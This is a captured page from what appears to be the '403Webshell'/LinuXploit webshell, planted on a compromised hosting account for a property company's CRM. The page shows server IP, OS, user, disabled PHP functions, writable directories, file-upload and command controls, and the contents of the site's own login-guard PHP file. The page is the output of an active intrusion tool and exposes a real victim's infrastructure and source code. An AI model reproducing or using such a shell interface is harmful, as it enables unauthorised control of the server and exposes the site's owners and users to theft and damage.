403Webshell
Server IP : 72.60.21.38  /  Your IP : 216.73.216.25
Web Server : LiteSpeed
System : Linux uk-fast-web1372.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : u390967363 ( 390967363)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u390967363/domains/aibenproperties.com/public_html/crm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u390967363/domains/aibenproperties.com/public_html/crm/auth-guard.php
<?php
require 'config.php'; // Your DB connection

if (session_status() == PHP_SESSION_NONE) {
    session_start();
}

// ✅ 1. Redirect to login if not logged in
if (!isset($_SESSION['admin']) || !isset($_SESSION['admin_id'])) {
    header("Location: login.html");
    exit();
}

// ✅ 2. Inactivity check (30 minutes)
$inactiveLimit = 1800; // 30 minutes in seconds

if (isset($_SESSION['last_active'])) {
    $elapsed = time() - $_SESSION['last_active'];
    if ($elapsed > $inactiveLimit) {
        session_unset();
        session_destroy();
        echo "<script>alert('Session expired due to inactivity. Please login again.'); window.location.href='login.html';</script>";
        exit();
    }
}

// // ✅ 3. Check if admin still exists in DB
if (isset($_SESSION['admin_id'])) {
    $adminId = $_SESSION['admin_id'];

    // Check if it's a super admin
    $stmt = $conn->prepare("SELECT id FROM super_admins WHERE id = ?");
    $stmt->bind_param("i", $adminId);
    $stmt->execute();
    $result = $stmt->get_result();

    if ($result->num_rows > 0) {
        // Super admin found, proceed with super admin-specific logic
        // You can add any specific super admin logic here

    } else {
        // If not a super admin, check the regular admin table
        $stmt = $conn->prepare("SELECT id FROM admins WHERE id = ?");
        $stmt->bind_param("i", $adminId);
        $stmt->execute();
        $result = $stmt->get_result();

        if ($result->num_rows === 0) {
            // No admin record found, the account might have been deleted
            session_unset(); // Clear all session variables
            session_destroy(); // Destroy the session
            echo "<script>alert('Your account has been deleted.'); window.location.href='login.html';</script>";
            exit();
        }
    }

} else {
    // If no session exists for the admin, redirect to login
    echo "<script>alert('You must be logged in to access this page.'); window.location.href='login.html';</script>";
    exit();
}

// ✅ Update last active timestamp
$_SESSION['last_active'] = time();

Youez - 2016 - github.com/yon3zu
LinuXploit